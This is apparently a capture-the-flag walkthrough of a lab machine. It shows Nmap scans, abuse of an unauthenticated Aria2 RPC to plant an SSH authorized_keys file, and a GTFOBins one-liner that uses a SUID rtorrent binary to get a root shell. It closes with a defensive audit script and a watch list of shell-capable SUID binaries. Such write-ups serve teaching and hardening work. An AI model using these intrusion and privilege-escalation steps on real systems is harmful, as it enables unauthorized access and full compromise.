When the machine starts, it displays its IP address; in this case, it is 192.168.18.190.
The victim machine's IP address
To begin, we will perform a scan with Nmap to identify the open ports on the target machine. First, we run a quick scan across all 65535 ports (no service detection yet) that simply tells us which ports are open:
sudo nmap -sS -p- --min-rate 4500 -n -Pn 192.168.18.190
And now, with the open ports identified, we will perform a more detailed scan:
nmap -sCV -p22,80,6800 -n -Pn 192.168.18.190 -oN target
We observe that port 6800 is running Aria2, an open-source download utility that supports protocols such as HTTP, FTP and BitTorrent.
By accessing port 80, we obtain the username Carolina.
User carolina
Next, we notice that by selecting ‘By URLs’ within ‘Add’, we can have Aria2 fetch a file from a URL and save it into any directory we choose. So we copy our id_rsa.pub to a file named authorized_keys and upload it, which makes the victim machine accept our key for the user carolina.
cp id_rsa.pub authorized_keys
If you don’t have the id_rsa.pub file, you can create it with the following command:
ssh-keygen
And with Python, we start a web server on port 8080:
python3 -m http.server 8080
Now we enter the URL where our file is being served and change the destination directory to /home/carolina/.ssh.
We submit the download, and now we can log in over port 22 (SSH) as the user carolina.
We are now Carolina
Let’s check how many users are on the machine by listing the accounts whose shell is /bin/bash. It appears that there are only two users: carolina and root.
grep /bin/bash /etc/passwd
User on the machine
We get the user flag, and now it’s time to move on to privilege escalation.
Privilege escalation to Root
We enumerate the SUID binaries on the machine, and one of them can be used to escalate to root very easily: rtorrent.
We search GTFOBins, which provides a way to escalate to root with this SUID binary by running the following commands:
Command for privilege escalation
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
/usr/bin/rtorrent
We are root
Now that we have root access, let’s grab the root flag and complete the machine.
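The two weaknesses this machine was built around, an unauthenticated Aria2 RPC that writes downloads anywhere and a SUID rtorrent binary, are both things a hardening review can catch before anyone reaches port 6800. The following audit script is an added example for that purpose, not code from the original writeup: it parses an aria2.conf fragment for the risky settings (enable-rpc without rpc-secret, rpc-listen-all, allow-overwrite, all real aria2 option names) and walks a directory tree for setuid binaries on a watch list. The sample configuration and the watch list are constructed for illustration.

```python
import os
import stat

# Constructed watch list: setuid binaries a review should question because
# they can spawn a shell (rtorrent is the one this machine used).
SUID_WATCHLIST = {"rtorrent", "find", "vim", "bash"}


def audit_aria2_conf(text: str) -> list[str]:
    """Return findings for an aria2.conf fragment (key=value lines)."""
    opts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        opts[key.strip()] = value.strip()
    findings = []
    if opts.get("enable-rpc", "false") == "true":
        if not opts.get("rpc-secret"):
            findings.append("rpc enabled without rpc-secret: anyone reaching the RPC port can queue downloads")
        if opts.get("rpc-listen-all", "false") == "true":
            findings.append("rpc-listen-all=true: RPC bound to all interfaces, not only loopback")
    if opts.get("allow-overwrite", "false") == "true":
        findings.append("allow-overwrite=true: a download can replace existing files such as authorized_keys")
    return findings


def is_suid(mode: int) -> bool:
    """True only for regular files with the setuid bit (directories excluded)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def walk_suid(root: str) -> list[str]:
    """Paths under root that are setuid regular files on the watch list."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished entry: skip, do not abort
            if name in SUID_WATCHLIST and is_suid(mode):
                hits.append(path)
    return sorted(hits)


# Constructed aria2.conf reproducing the exposure found on port 6800.
SAMPLE_CONF = "enable-rpc=true\nrpc-listen-all=true\nallow-overwrite=true\ndir=/home/carolina/Downloads\n"

if __name__ == "__main__":
    for finding in audit_aria2_conf(SAMPLE_CONF):
        print("aria2:", finding)
    for path in walk_suid("/usr"):
        print("suid:", path)
```

Running it as root on the target would list /usr/bin/rtorrent under "suid:" and three findings for the sample config; a config with rpc-secret set and the other two options left at their defaults produces no findings.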